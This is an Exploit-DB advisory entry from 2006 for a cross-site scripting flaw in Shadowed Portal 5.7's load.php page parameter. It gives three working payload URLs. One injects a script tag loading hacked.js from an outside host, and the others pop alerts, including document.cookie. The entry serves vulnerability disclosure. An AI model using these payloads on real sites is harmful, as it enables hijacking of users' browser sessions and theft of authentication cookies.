Lucene search

K
exploitdbLiz0ziMEDB-ID:27591
HistoryApr 10, 2006 - 12:00 a.m.

Shadowed Portal 5.7 - 'Load.php' Cross-Site Scripting

2006-04-1000:00:00
Liz0ziM
www.exploit-db.com
15

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/17430/info

Shadowed Portal is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

All versions of Shadowed Portal are considered vulnerable at the moment.

http://www.example.com/path/load.php?mod=pages&page="><script src=http://liz0.li.funpic.org/hacked.js></script>

http://www.example.com/path/load.php?mod=pages&page="><script>alert(/BiyoSecurityTeam/)</script>

http://www.example.com/path/load.php?mod=pages&page="><script>alert(document.cookie)</script>

AI Score

7.4

Confidence

Low

Related for EDB-ID:27591